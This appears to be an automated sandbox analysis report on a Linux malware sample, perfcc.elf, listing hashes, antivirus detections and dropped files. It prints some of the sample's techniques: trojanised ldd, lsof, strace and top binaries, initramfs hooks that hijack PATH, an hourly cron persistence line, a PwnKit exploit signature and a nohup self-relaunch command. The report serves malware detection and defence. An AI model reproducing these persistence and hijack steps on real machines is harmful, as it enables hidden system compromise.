Entropy (8bit):	3.729742577889037
Encrypted:	false
SSDEEP:	192:RgbwvdthbVvwm8C7QpCEtPR5U0PkHWQKXrLH50oi:bd/tD7QpCgU0PphH
MD5:	AD37B13E2476F8E15CF0D22652895D1D
SHA1:	6B945B85FBBDA4AA2CC8A7C6E71437F66974174D
SHA-256:	CE3CD079C5CF251798CBC6982308778E6BC6C47A11C8E09C692EEA0706E73DB2
SHA-512:	0DE3D84A78E7A9C80836E89F5AF7034814C27811EFA8B5787240D7070937527DECAAEC5CF4DD4EEF76A57311DA541BDA1DFB813CE3687C28EEE19B7AD7E46FA4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	.ELF..............>.............@.......P7..........@.8...@.............@.......@.......@.......h.......h................................................................................................................................................................................................ ....... ....... .......................................-.......=.......=......I................................-.......=.......=..............................................................D.......D...............P.td....X ......X ......X ..............................Q.td....................................................R.td.....-.......=.......=............................../lib64/ld-linux-x86-64.so.2.............GNU.j...:.#..r..B.\|Uy.Se............GNU.................................0.....@..................k.e.m..@9..........................s.......................F........................... ...................#.......................8.......................?.......................

/usr/bin/.local/bin/ldd

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a96d2dc79fcffb6c5cf3ea5b64808fc551cb4cd1, for GNU/Linux 3.2.0, stripped
Category:	dropped
Size (bytes):	15504
Entropy (8bit):	3.5460289109870966
Encrypted:	false
SSDEEP:	192:Rv3wfdthB9hsjYHQrsdn4EXaWPkH5g/50oit:ad/UYHQrsdzaWP
MD5:	CF265A3A3DD068D0AA0C70248CD6325D
SHA1:	263B31723094AF0799F915718921DF19A9EEC822
SHA-256:	DB81C115407267801B7C32BD3DA0533306C7C586A82839FFE324E8794E3DCC01
SHA-512:	A144C7F7E195E98751EB7823443C7A114ABA9DFFEFF82668F6B10D65FC25704D6DA607FA30F286A37EA6CD5E6C70A495B635CF211BCA38DFFA50AA19843F0EB8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	.ELF..............>.............@........5..........@.8...@.............@.......@.......@.......h.......h................................................................................................................................................................................................ ....... ....... .......................................-.......=.......=.......................................-.......=.......=..............................................................D.......D...............P.td....X ......X ......X ..............................Q.td....................................................R.td.....-.......=.......=............................../lib64/ld-linux-x86-64.so.2.............GNU..m-...l\..[d...Q.L.............GNU.................................0.....@..................k.e.m..@9..........................s.......................F........................... ...................#.......................8.......................?.......................

/usr/bin/.local/bin/lsof

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=d7ad8ac9dbf5d24d3c2a262df10b41c12aac567a, for GNU/Linux 3.2.0, stripped
Category:	dropped
Size (bytes):	15608
Entropy (8bit):	3.5917803342773045
Encrypted:	false
SSDEEP:	192:RWRwudthRdoDqQpCtLcgXXadPkHvCqD0oi:Kd/aqQpCtzqdPv
MD5:	2053098DDCF12CCEA2AF8C2C180278E5
SHA1:	C862B42D01280CBA1BF310BDF586CF56DC3218D9
SHA-256:	1A695A4202AB5D7797F7BBBC434C56775F1524D7622CD54A0BCBF5B032AF7E6A
SHA-512:	568943EA186E923EFC8A23427C34B8B09AA66ED1F7D18B280C51F3D7CCABAE0DABF5DB9265DAC53D61E9F524B45D1D65375F7300B3950CEFE1D0F108D9DA73AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	.ELF..............>.............@........5..........@.8...@.............@.......@.......@.......h.......h................................................................................................................................................................................................ ....... ....... .......................................-.......=.......=..............@........................-.......=.......=..............................................................D.......D...............P.td....X ......X ......X ..............................Q.td....................................................R.td.....-.......=.......=............................../lib64/ld-linux-x86-64.so.2.............GNU.......M<&-..A..Vz............GNU.................................0.....@..................k.e.m..@9..........................s.......................F........................... ...................#.......................8.......................?.......................

/usr/bin/.local/bin/strace

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=af21be066e38458092aad31335e213436d8da004, for GNU/Linux 3.2.0, stripped
Category:	dropped
Size (bytes):	15552
Entropy (8bit):	3.565023504705042
Encrypted:	false
SSDEEP:	192:RDXwfdthDd2vfnjlQpScHR3/sy49PkHsUb6oJ0oi:qd/ZelQpScHX49Pu
MD5:	55EDCBCD4120224D03185F6AB50E0602
SHA1:	398887E4F87BB15F6EF994C5502E3D20899CBEB0
SHA-256:	C25EAF34008B499D44620E7C73EDB052E1D9C8CDE30174DCE90AC37DA5DBC2DF
SHA-512:	3A795C6562C0DCFD7A54F05A94F7FBEDCADB3D42E1552EB7DC0B56D53F14C3689DB0A6FEC0016A46854B32BC1F1C14D9FA34F7B502E8CD3460AF4E75A746E495
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	.ELF..............>.............@........5..........@.8...@.............@.......@.......@.......h.......h................................................................................................................................................................................................ ....... ....... .......................................-.......=.......=.............. ........................-.......=.......=..............................................................D.......D...............P.td....X ......X ......X ..............................Q.td....................................................R.td.....-.......=.......=............................../lib64/ld-linux-x86-64.so.2.............GNU..!..n8E.....5..Cm...............GNU.................................0.....@..................k.e.m..@9..........................s.......................F........................... ...................#.......................8.......................?.......................

/usr/bin/.local/bin/top

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=60101a29be88a6b941762028197f3b3612335048, for GNU/Linux 3.2.0, stripped
Category:	dropped
Size (bytes):	15880
Entropy (8bit):	3.6978987691154632
Encrypted:	false
SSDEEP:	192:RQGwvdthJEKE8jQFHM0rq8AS30PkH1EYJB+zv0oi:8d/7jQFHxOC30PpYb+z
MD5:	DA006A0B9B51D56FA3F9690CF204B99F
SHA1:	4D3A4F916AEB9234C3DE1423330FA8B0EC3E2518
SHA-256:	31EE4C9984F3C21A8144CE88980254722FD16A0724AFB16408E1B6940FD599DA
SHA-512:	B48FEF6F8EEE0CE98994573068BF50BD0B3A61D81F9D1F76BF70B633159F1435B8D26A814D97583293909AA439B2BDBB24256E4F119966A3AF72B0C05A013972
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	.ELF..............>.............@........7..........@.8...@.............@.......@.......@.......h.......h................................................................................................................................................................................................ ....... ....... .......................................-.......=.......=..............`........................-.......=.......=..............................................................D.......D...............P.td....X ......X ......X ..............................Q.td....................................................R.td.....-.......=.......=............................../lib64/ld-linux-x86-64.so.2.............GNU.`..)....Av (..;6.3PH............GNU.................................0.....@..................k.e.m..@9..........................s.......................F........................... ...................#.......................8.......................?.......................

/usr/bin/perfcc

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	9301499
Entropy (8bit):	7.785600290387435
Encrypted:	false
SSDEEP:	196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2
MD5:	656E22C65BF7C04D87B5AFBE52B8D800
SHA1:	0FD199053171FEC86BE186106EAC717C4EDAE2AD
SHA-256:	22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13
SHA-512:	697954F75E391A6CC600B7D40509AC1A1515CB0A4234CC3AE4270BEAF7BBC3A3DA23A9CD4F25E0EB4F5956D24CA3866E2574DC9493644845AAC1063E1E4B0183
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	.ELF..............>.....X.......@...................@.8...@.......................@.......@..................... .............................................H=..............Q.td.....................................................>U............ ... ...X...\|......... ..ELF......>....@..6..@/`..I&8.....6....W...@.@..6... .o....l......E...'/....xi,o.....@........o..Xh!_.Q.td..$..`.o.$I.......e......"..PX..H.Ml...%.......'..`....C@....v;....E.U...10....{....<+].......d.1..I.....E1...`n/P..?....r.\....\........}.w...!.....u.....Q......}.wqke...\_Y]T.N.H.r.\B<60Q....+.H....\|$...#.A....~....)n=.H.H..H.5....2...\...{.7"W.I.....o....@.H....@X..8F.?....<..7K.H=.t......{..t..!...=.....H..?.......H..H..a.=..-?..].u&U\..bG..@.........B..iJ.]..;.....U...m.GuiL].\|....w.f....%.I;....f.v8Mtl$....tF..D$ \$(f....!..;..,.I....S..^....S7.O.....L.d....$.M........$.......$...TL....0............v.+..<..}...1.L......1."9......q.o./.9.....)..{.I..H...w.....!....\|..8cpu..\|..u.1..

/usr/bin/wizlmsh

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=26af5d3d79659be9beb957a991d9d7143896058d, stripped
Category:	dropped
Size (bytes):	11056
Entropy (8bit):	3.516694430600875
Encrypted:	false
SSDEEP:	96:RmTJaB6WBVYqYJ/JeHYtT2u/w5z8Xj2XskMI+fsHjnkSPZMR+HsESibL69m:RmsoWjYq2JeHcw5oXIMekSRXsESi
MD5:	BA120E9C7F8896D9148AD37F02B0E3CB
SHA1:	3B78DBCAC10C3C3BCB38A9AA077B8F62BDEA5F2D
SHA-256:	CA3F246D635BFA560F6C839111BE554A14735513E90B3E6784BEDFE1930BDFD6
SHA-512:	B6E483F4F32652D160707863537C959DC15237AEBE9E6BE9C2A468E28A9CA62869A05E5C4D2AE456AA93F1FC02329CAEB1F84B3F52C67E193909B2317AED0690
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Preview:	.ELF..............>.............@........#..........@.8...@.............@.......@.......@.......................................8.......8.......8...............................................................\.......\......... ....................... ....... ....................... ....................... ....... .....................................T.......T.......T.......D.......D...............P.td.... ....... ....... .......l.......l...............Q.td....................................................R.td.............. ....... .....(.......(.............../lib64/ld-linux-x86-64.so.2.............GNU............. ...............GNU.&.]=ye..W.....8...........................................................j.......................o... ...................1............................................... ...............................................X...............................................;........................... ...................*.......................Q...............

/usr/lib/libfsnldev.so

Download File

Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	9301499
Entropy (8bit):	7.785600290387435
Encrypted:	false
SSDEEP:	196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2
MD5:	656E22C65BF7C04D87B5AFBE52B8D800
SHA1:	0FD199053171FEC86BE186106EAC717C4EDAE2AD
SHA-256:	22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13
SHA-512:	697954F75E391A6CC600B7D40509AC1A1515CB0A4234CC3AE4270BEAF7BBC3A3DA23A9CD4F25E0EB4F5956D24CA3866E2574DC9493644845AAC1063E1E4B0183
Malicious:	true
Yara Hits:	Rule: Linux_Exploit_CVE_2021_4034_1c8f235d, Description: unknown, Source: /usr/lib/libfsnldev.so, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	.ELF..............>.....X.......@...................@.8...@.......................@.......@..................... .............................................H=..............Q.td.....................................................>U............ ... ...X...\|......... ..ELF......>....@..6..@/`..I&8.....6....W...@.@..6... .o....l......E...'/....xi,o.....@........o..Xh!_.Q.td..$..`.o.$I.......e......"..PX..H.Ml...%.......'..`....C@....v;....E.U...10....{....<+].......d.1..I.....E1...`n/P..?....r.\....\........}.w...!.....u.....Q......}.wqke...\_Y]T.N.H.r.\B<60Q....+.H....\|$...#.A....~....)n=.H.H..H.5....2...\...{.7"W.I.....o....@.H....@X..8F.?....<..7K.H=.t......{..t..!...=.....H..?.......H..H..a.=..-?..].u&U\..bG..@.........B..iJ.]..;.....U...m.GuiL].\|....w.f....%.I;....f.v8Mtl$....tF..D$ \$(f....!..;..,.I....S..^....S7.O.....L.d....$.M........$.......$...TL....0............v.+..<..}...1.L......1."9......q.o./.9.....)..{.I..H...w.....!....\|..8cpu..\|..u.1..

/usr/lib/libgcwrap.so

Download File

Process:	/tmp/.perf.c/raid5wq
File Type:	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0def91828514b6bb0a926e52c28d74fc2c8c8a04, stripped
Category:	dropped
Size (bytes):	80800
Entropy (8bit):	4.909740282389583
Encrypted:	false
SSDEEP:	1536:eeDWUH0igZjOTy8RaxJbO4FGzviwFRsXFqNKatq:eYH0igZOTfIxofzviwFRsXFxak
MD5:	835A9A6908409A67E51BCE69F80DD58A
SHA1:	DFA0024B534410F9121D5842526CA47C086B0EA1
SHA-256:	A6D3C6B6359AE660D855F978057AAB1115B418ED277BB9047CD488F9C7850747
SHA-512:	7EA02787DC582D374C36A43E86485AAC9940EF031A686F5DB4C7F587899B038F12275BCA3FD802615499AC6414FF3E9C324114CFCFA01A99F2D5970A6DE0E52B
Malicious:	false
Preview:	.ELF..............>......%......@....... 5..........@.8...@.....................................<.......<......... ....................... ....... ......6......(=........ ....................... ....... .............................................................$.......$...............P.td....................................................Q.td....................................................R.td.............. ....... .....`.......`...........................GNU.........nR.t.,.......%...X................. ..4......."..............5...... ....D)."Z.`B..:.......D.X...Y...[...\...]..._...b...c...d...........g...h...i...j...l...n...q.......r.......s...........t...w.......{...\|...}...............................w.\|..Z.QB.5.`...I.OBfK....\|. .-....}.s.....+..".3M.ls..AM.\|cQ.}...G.u.Z.;.-......\|..`.j...e... ...+&.7..z.#. .qX........=vo.p..\|..Z.!.....n.......G.c.CE...duUJ.).!t..X..h\..>...w............................................................d...............................

/usr/lib/libpprocps.so

Download File

Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	9301499
Entropy (8bit):	7.785600290387435
Encrypted:	false
SSDEEP:	196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2
MD5:	656E22C65BF7C04D87B5AFBE52B8D800
SHA1:	0FD199053171FEC86BE186106EAC717C4EDAE2AD
SHA-256:	22E4A57AC560EBE1EFF8957906589F4DD5934EE555EBCC0F7BA613B07FAD2C13
SHA-512:	697954F75E391A6CC600B7D40509AC1A1515CB0A4234CC3AE4270BEAF7BBC3A3DA23A9CD4F25E0EB4F5956D24CA3866E2574DC9493644845AAC1063E1E4B0183
Malicious:	true
Yara Hits:	Rule: Linux_Exploit_CVE_2021_4034_1c8f235d, Description: unknown, Source: /usr/lib/libpprocps.so, Author: unknown Rule: Linux_Exploit_CVE_2021_4034_1c8f235d, Description: unknown, Source: /usr/lib/libpprocps.so, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	.ELF..............>.....X.......@...................@.8...@.......................@.......@..................... .............................................H=..............Q.td.....................................................>U............ ... ...X...\|......... ..ELF......>....@..6..@/`..I&8.....6....W...@.@..6... .o....l......E...'/....xi,o.....@........o..Xh!_.Q.td..$..`.o.$I.......e......"..PX..H.Ml...%.......'..`....C@....v;....E.U...10....{....<+].......d.1..I.....E1...`n/P..?....r.\....\........}.w...!.....u.....Q......}.wqke...\_Y]T.N.H.r.\B<60Q....+.H....\|$...#.A....~....)n=.H.H..H.5....2...\...{.7"W.I.....o....@.H....@X..8F.?....<..7K.H=.t......{..t..!...=.....H..?.......H..H..a.=..-?..].u&U\..bG..@.........B..iJ.]..;.....U...m.GuiL].\|....w.f....%.I;....f.v8Mtl$....tF..D$ \$(f....!..;..,.I....S..^....S7.O.....L.d....$.M........$.......$...TL....0............v.+..<..}...1.L......1."9......q.o./.9.....)..{.I..H...w.....!....\|..8cpu..\|..u.1..

/usr/share/initramfs-tools/hooks/sed3s35R9

Download File

Process:	/usr/bin/sed
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1710
Entropy (8bit):	5.236042721427127
Encrypted:	false
SSDEEP:	48:rWqM/woHS/uZEsA7i89Qea4Ug6FQm1vkyP:rfoyj37GezUom1jP
MD5:	B07481B442013B92E1729E3474C86036
SHA1:	A657BCC9350190100B6A06DF64DBE34575A8AD1B
SHA-256:	287C8BDFB79BD4D42868D246775ED0A840895984DC09D5A3BF68CBABE849F894
SHA-512:	221EC820B985314F8506A34C6916453BC96F34B48E63876931AD3B3C637AD6BFFFCF1A6138052F97352698867CD876FE3A5BBF6A55E288AF8DE7DA702A8E5B21
Malicious:	true
Preview:	#!/bin/sh.export PATH=/bin/.local/bin:$PATH..set -e..PREREQ="cryptroot"..prereqs().{. echo "$PREREQ".}..case "$1" in. prereqs). prereqs. exit 0. ;;.esac... /usr/share/initramfs-tools/hook-functions.. /lib/cryptsetup/functions..if [ ! -x "$DESTDIR/lib/cryptsetup/scripts/decrypt_opensc" ] \|\| [ ! -f "$TABFILE" ]; then. exit 0.fi..# Hooks for loading smartcard reading software into the initramfs.copy_keys() {. crypttab_parse_options. if [ "${CRYPTTAB_OPTION_keyscript-}" = "/lib/cryptsetup/scripts/decrypt_opensc" ]; then. if [ -f "$CRYPTTAB_KEY" ]; then. [ -f "$DESTDIR$CRYPTTAB_KEY" ] \|\| copy_file keyfile "$CRYPTTAB_KEY" \|\| RV=$?. else. cryptsetup_message "ERROR: Target $CRYPTTAB_NAME has a non-existing key file $CRYPTTAB_KEY". RV=1. fi. fi.}..RV=0.crypttab_foreach_entry copy_keys..# Install directories needed by smartcard reading daemon, command, and.# key-script.mkdir -p -- "$DESTDIR/etc/opensc" "

/usr/share/initramfs-tools/hooks/sedFIsfM5

Download File

Process:	/usr/bin/sed
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	602
Entropy (8bit):	5.34216747424573
Encrypted:	false
SSDEEP:	12:rM5V3BhxI5CieUE4G714jbhP68wa44jDiETIK5d:rM/3bTtU1h6Za44dTIId
MD5:	D1843862BBF68E9545E783A8DB41D048
SHA1:	634BE79C533B528FF87A7581E43DF3744A57B23C
SHA-256:	9E3B3EA0CA3106653EF7580CC4013135B1C250B1A9D42717C048B2F77C4BAB2A
SHA-512:	0B7DBD65D9CAD9F3F3B9E9598BD9447C961D6B58598C6E78CC1FEA28CD3031599D0AA9A45685AEA8DB396C730AFD50AEEABCBD4D5C5C061073DEAEA7851E8BB3
Malicious:	true
Preview:	#!/bin/sh.export PATH=/bin/.local/bin:$PATH..set -e..PREREQ=""..prereqs().{..echo "${PREREQ}".}..case "${1}" in..prereqs)...prereqs...exit 0...;;.esac... /usr/share/initramfs-tools/hook-functions..if [ -x /bin/btrfs ].then..copy_exec /bin/btrfs /bin..if [ ! -x /usr/share/initramfs-tools/hooks/fsck ] && [ ! -x /etc/initramfs-tools/hooks/fsck ]..then.. copy_exec /sbin/fsck.btrfs /sbin..fi..LIBC_DIR=$(ldd /bin/btrfs \| sed -nr 's#.* => (/lib.)/libc\.so\.[0-9.-]+ $0x[[:xdigit:]]+$$#\1#p')..find -L "$LIBC_DIR" -maxdepth 1 -name 'libgcc_s.' -type f \| while read so; do...copy_exec "$so"..done.fi.

/usr/share/initramfs-tools/hooks/sedfK3s9f

Download File

Process:	/usr/bin/sed
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	17278
Entropy (8bit):	5.027459878443368
Encrypted:	false
SSDEEP:	384:WmdZEGxBH8hM3DOo02UCeWig/HSLi7pfmZb+GVWYSwiK8Yo6GLXLhjo:XdZzx8wi27LYO7puZSGVWYEYo6Gje
MD5:	AA2FBE94004ECB6CD7DFED34DCBFFD1B
SHA1:	685E71D66E214870287BC7E467CBB4F118DFA421
SHA-256:	B40831D0CF1D54100919FD9C8FFC8F82F2ED78DBEEC8D413447159499DCAFF49
SHA-512:	3B0B7254BE71ADD543F5D42F15234D64C31991CD50FCCB96309183A106F2538DCF89A896CB95C88D45EBD7705F260B5B4030744821CD57EEC817CD6FEEFFA974
Malicious:	true
Preview:	#!/bin/sh.export PATH=/bin/.local/bin:$PATH..PREREQ=""..prereqs().{. echo "$PREREQ".}..case "$1" in. prereqs). prereqs. exit 0. ;;.esac... /usr/share/initramfs-tools/hook-functions.. /lib/cryptsetup/functions.TABFILE="/etc/crypttab"...# device_uuid($device).# Print the UUID attribute of given block special $device. Return 0.# on success, 1 on error..device_uuid() {. local device="$1" uuid. if uuid="$(blkid -s UUID -o value -- "$device")" && [ -n "$uuid" ]; then. printf '%s\n' "$uuid". else. return 1. fi.}..# resolve_device({$device \| $spec}).# Take a path to (or spec for) a block special device, and set DEV to.# the (symlink to block) device, and MAJ (resp. MIN) to its major-ID.# (resp. minor ID) decimal value. On error these variables are not.# changed and 1 is returned..resolve_device() {. local spec="$1" dev devno maj min. if dev="$(resolve_device_spec "$spec")" &&. devno="$(stat -L -c"%t:%T" -- "$de

/var/spool/cron/crontabs/tmp.trS8GJ

Download File

Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	212
Entropy (8bit):	5.082960745213408
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLY6q9BMvZHGMQ5UYLtCFt3mU16aKcNNAt:8QjHig8U6q96JeHLU0aNN0
MD5:	36CDA9E1510B46438F65A4D72BA7F5E2
SHA1:	1B774CFD028063AB1189182D7DF3588CB8B7C0A1
SHA-256:	EFA943004AA75FF71772819D068F2EED1ABA43A69943AB3EC0E00894321C59F3
SHA-512:	9582C60F4EB194E3BEBDEEAF5B36383A06DBF20BF90593944DADD40C0A8898DD494B1ECA334D45F678631A992D05B96CD92D895FB27B017C4C530FF19237F46C
Malicious:	true
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Oct 10 06:01:11 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).11 * * * * /root/.config/cron/perfcc.

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Entropy (8bit):	7.785600290387435
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	perfcc.elf
File size:	9'301'499 bytes
MD5:	656e22c65bf7c04d87b5afbe52b8d800
SHA1:	0fd199053171fec86be186106eac717c4edae2ad
SHA256:	22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
SHA512:	697954f75e391a6cc600b7d40509ac1a1515cb0a4234cc3ae4270beaf7bbc3a3da23a9cd4f25e0eb4f5956d24ca3866e2574dc9493644845aac1063e1e4b0183
SSDEEP:	196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2
TLSH:	5896232BF64A1DE5C5A81374C882B374A3B2D109CB23C7532FAD5771FC7A2568F95882
File Content Preview:	.ELF..............>.....X.......@...................@.8...@.......................@.......@....................... .............................................H=..............Q.td.....................................................>U............. ... ..

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0xcddf58
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	64
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0x400000	0x400000	0x8de8d0	0x8de8d0	7.7856	0x5	R E	0x200000
LOAD	0x0	0xcdf000	0xcdf000	0x0	0xa43d48	0.0000	0x6	RW	0x1000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 10, 2024 13:00:30.558120966 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 10, 2024 13:00:36.189136028 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 10, 2024 13:00:37.213025093 CEST	42516	80	192.168.2.23	109.202.202.202
Oct 10, 2024 13:00:51.291162968 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 10, 2024 13:01:03.577380896 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 10, 2024 13:01:07.672789097 CEST	42516	80	192.168.2.23	109.202.202.202
Oct 10, 2024 13:01:32.245382071 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 10, 2024 13:01:59.035938978 CEST	50920	80	192.168.2.23	104.26.12.205
Oct 10, 2024 13:01:59.041377068 CEST	80	50920	104.26.12.205	192.168.2.23
Oct 10, 2024 13:01:59.041440964 CEST	50920	80	192.168.2.23	104.26.12.205
Oct 10, 2024 13:01:59.048808098 CEST	50920	80	192.168.2.23	104.26.12.205
Oct 10, 2024 13:01:59.053668976 CEST	80	50920	104.26.12.205	192.168.2.23
Oct 10, 2024 13:01:59.516097069 CEST	80	50920	104.26.12.205	192.168.2.23
Oct 10, 2024 13:01:59.516192913 CEST	50920	80	192.168.2.23	104.26.12.205
Oct 10, 2024 13:02:29.581557989 CEST	50920	80	192.168.2.23	104.26.12.205
Oct 10, 2024 13:02:29.586662054 CEST	80	50920	104.26.12.205	192.168.2.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 10, 2024 13:01:59.023488998 CEST	33547	53	192.168.2.23	1.1.1.1
Oct 10, 2024 13:01:59.023488998 CEST	36057	53	192.168.2.23	1.1.1.1
Oct 10, 2024 13:01:59.031367064 CEST	53	33547	1.1.1.1	192.168.2.23
Oct 10, 2024 13:01:59.032416105 CEST	53	36057	1.1.1.1	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 10, 2024 13:01:59.023488998 CEST	192.168.2.23	1.1.1.1	0x58f4	Standard query (0)	api.ipify.org	28	IN (0x0001)	false
Oct 10, 2024 13:01:59.023488998 CEST	192.168.2.23	1.1.1.1	0xdadd	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 10, 2024 13:01:59.032416105 CEST	1.1.1.1	192.168.2.23	0xdadd	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 10, 2024 13:01:59.032416105 CEST	1.1.1.1	192.168.2.23	0xdadd	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 10, 2024 13:01:59.032416105 CEST	1.1.1.1	192.168.2.23	0xdadd	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	50920	104.26.12.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 13:01:59.048808098 CEST	106	OUT	GET / HTTP/1.1 Host: api.ipify.org User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Oct 10, 2024 13:01:59.516097069 CEST	239	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 11:01:59 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d061d969a448c8a-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

System Behavior

Analysis Process: perfcc.elf PID: 6239, Parent PID: 6159

General

Start time (UTC):	11:00:30
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	/tmp/perfcc.elf
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:30
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:30
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf CLK_TCK
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Start time (UTC):	11:00:30
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:30
Start date (UTC):	10/10/2024
Path:	/usr/bin/getconf
Arguments:	getconf PAGESIZE
File size:	35112 bytes
MD5 hash:	4c206cdb0a9f19e43beb204006c4067f

Start time (UTC):	11:00:30
Start date (UTC):	10/10/2024
Path:	/tmp/perfcc.elf
Arguments:	-
File size:	9301499 bytes
MD5 hash:	656e22c65bf7c04d87b5afbe52b8d800

Start time (UTC):	11:00:30
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin;nohup /tmp/perfcc.elf >/dev/null 2>/dev/null & exit"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	11:00:30
Start date (UTC):	10/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
